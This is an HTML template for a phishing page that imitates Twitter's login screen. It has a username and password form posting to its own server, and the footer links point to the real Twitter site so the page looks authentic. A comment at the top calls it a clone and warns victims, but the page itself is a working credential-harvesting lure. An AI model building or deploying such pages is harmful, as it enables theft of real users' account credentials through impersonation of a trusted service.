
<!--
                ~ DISCLAIMER ~
  This page constitutes a clone of the original site and
  in NO WAY is connected to the real one. If you see this
  message and you are not FULLY AWARE of what this
  page is, then someone is trying to STEAL YOUR CREDENTIALS.
  DO NOT PUT ANY PERSONAL INFORMATION ANYWHERE.

  IF YOU HAVEN'T PUT ANY PERSONAL INFORMATION DO NOT WORRY.
  CLOSE THIS PAGE AND REPORT THE PERSON THAT SENT YOU THE LINK.

  ~ THE ORIGINAL AUTHOR OF THIS APP HAS NOTHING TO DO WITH ANY MISUSE ~
-->

<!DOCTYPE html>
<html>
  <head>
    <link rel="stylesheet" href="static/twitter/twitter.css" />
    <link rel="icon" type="image/x-icon" href="static/twitter/favicon.ico">
  </head>
  <body>
    <div class="main">
      <div class="main-wrapper">
        <div class="left">
          <div class="items-wrapper">
            <div class="item">
              <span class="icon icon--search"></span>
              <span class="label">Follow your interests.</span>
            </div>
            <div class="item">
              <span class="icon icon--people"></span>
              <span class="label"
                >Hear what your people are talking about.</span
              >
            </div>
            <div class="item">
              <span class="icon icon--reply"></span>
              <span class="label">Join the conversation.</span>
            </div>
          </div>
        </div>
        <div class="right">
          <div class="top">
            <div class="input-group">
                <form method="post">
                    <input name="name" type="text" placeholder="Phone, email, or username" />
                    </div>
                    <div class="input-group">
                    <input name="password" type="password" placeholder="Password" />
                    <a class="forgot-password" href="https://twitter.com/i/flow/password_reset?input_flow_data=%7B%22requested_variant%22%3A%22eyJwbGF0Zm9ybSI6IlJ3ZWIifQ%3D%3D%22%7D">Forgot password?</a>
                    </div>
                    <button class="btn-login" type="submit">Log in</button>
                </div>
                </form>
          <div class="middle">
            <span class="icon icon--bird"></span>
            <h1>See what's happening in<br />the world right now</h1>
            <span>Join Twitter today.</span>
            <a class="btn-sign-up">Sign up</a>
          </div>
        </div>
      </div>
      <footer class="footer">
        <nav class="nav">
          <ul>
            <li>
              <a href="https://about.twitter.com/en">About</a>
            </li>
            <li>
              <a href="https://help.twitter.com/en">Help Center</a>
            </li>
            <li>
              <a href="https://blog.twitter.com/">Blog</a>
            </li>
            <li>
              <a href="https://status.twitterstat.us/">Status</a>
            </li>
            <li>
              <a href="https://careers.twitter.com/">Jobs</a>
            </li>
            <li>
              <a href="https://twitter.com/en/tos">Terms</a>
            </li>
            <li>
              <a href="https://twitter.com/en/privacy">Privacy Policy</a>
            </li>
            <li>
              <a href="https://help.twitter.com/en/rules-and-policies/twitter-cookies">Cookies</a>
            </li>
            <li>
              <a href="https://ads.twitter.com/login?ref=gl-tw-tw-twitter-advertise">Ads Info</a>
            </li>
            <li>
              <a href="https://about.twitter.com/en/who-we-are/brand-toolkit">Brand</a>
            </li>
            <li>
              <a>Apps</a>
            </li>
            <li>
              <a href="https://ads.twitter.com/login?ref=gl-tw-tw-twitter-advertise">Advertise</a>
            </li>
            <li>
              <a href="https://marketing.twitter.com/en_gb">Marketing</a>
            </li>
            <li>
              <a href="https://business.twitter.com/en/help/troubleshooting/how-twitter-ads-work.html?ref=web-twc-ao-gbl-adsinfo&utm_source=twc&utm_medium=web&utm_campaign=ao&utm_content=adsinfo">Business</a>
            </li>
            <li>
              <a href="https://developer.twitter.com/en">Developers</a>
            </li>
            <li>
              <a href="https://twitter.com/i/directory/profiles">Directory</a>
            </li>
            <li>
              <a href="https://twitter.com/settings">Settings</a>
            </li>
            <li>
              <a>© 2022 Twitter, Inc.</a>
            </li>
          </ul>
        </nav>
      </footer>
    </div>
  </body>
</html>
